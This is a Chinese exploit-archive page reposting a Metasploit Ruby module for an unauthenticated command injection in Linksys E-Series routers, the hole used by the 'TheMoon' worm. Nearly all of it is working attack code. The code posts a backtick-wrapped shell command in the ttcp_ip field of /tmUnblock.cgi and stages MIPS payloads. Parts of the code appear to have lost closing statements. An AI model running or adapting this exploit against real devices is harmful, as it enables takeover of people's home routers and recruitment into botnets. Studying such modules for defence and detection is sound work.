Linksys E-Series TheMoon Remote Command Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Linksys E-Series TheMoon Remote Command Injection Exploit

来源：metasploit.com 作者：vazquez 发布时间：2014-04-08

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::CmdStagerEcho

def initialize(info = {})

super(update_info(info,

'Name' => 'Linksys E-Series TheMoon Remote Command Injection',

'Description' => %q{

Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command

injection. This vulnerability was used from the so called "TheMoon" worm. There

are many Linksys systems that might be vulnerable including E4200, E3200, E3000,

E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested

successfully against an E1500 v1.0.5.

},

'Author' =>

[

'Johannes Ullrich', #worm discovery

'Rew', # original exploit

'infodox', # another exploit

'Michael Messner <devnull@s3cur1ty.de>', # Metasploit module

'juan vazquez' # minor help with msf module

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'EDB', '31683' ],

[ 'BID', '65585' ],

[ 'OSVDB', '103321' ],

[ 'URL', 'http://packetstormsecurity.com/files/125253/linksyseseries-exec.txt' ],

[ 'URL', 'http://packetstormsecurity.com/files/125252/Linksys-Worm-Remote-Root.html' ],

[ 'URL', 'https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633' ],

[ 'URL', 'https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630' ]

],

'DisclosureDate' => 'Feb 13 2014',

'Privileged' => true,

'Platform' => %w{ linux unix },

'Payload' =>

{

'DisableNops' => true

},

'Targets' =>

[

[ 'Linux mipsel Payload',

{

'Arch' => ARCH_MIPSLE,

'Platform' => 'linux'

}

],

[ 'Linux mipsbe Payload',

{

'Arch' => ARCH_MIPSBE,

'Platform' => 'linux'

}

],

'DefaultTarget' => 0

))

end

def execute_command(cmd, opts)

begin

res = send_request_cgi({

'uri' => '/tmUnblock.cgi',

'method' => 'POST',

'encode_params' => true,

'vars_post' => {

"submit_button" => "",

"change_action" => "",

"action" => "",

"commit" => "0",

"ttcp_num" => "2",

"ttcp_size" => "2",

"ttcp_ip" => "-h `#{cmd}`",

"StartEPI" => "1"

}

}, 2)

return res

rescue ::Rex::ConnectionError

fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")

end

def check

begin

res = send_request_cgi({

'uri' => '/tmUnblock.cgi',

'method' => 'GET'

})

if res && [200, 301, 302].include?(res.code)

return Exploit::CheckCode::Detected

end

rescue ::Rex::ConnectionError

return Exploit::CheckCode::Unknown

end

Exploit::CheckCode::Unknown

end

def exploit

print_status("#{peer} - Trying to access the vulnerable URL...")

unless check == Exploit::CheckCode::Detected

fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")

end

print_status("#{peer} - Exploiting...")

execute_cmdstager

end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告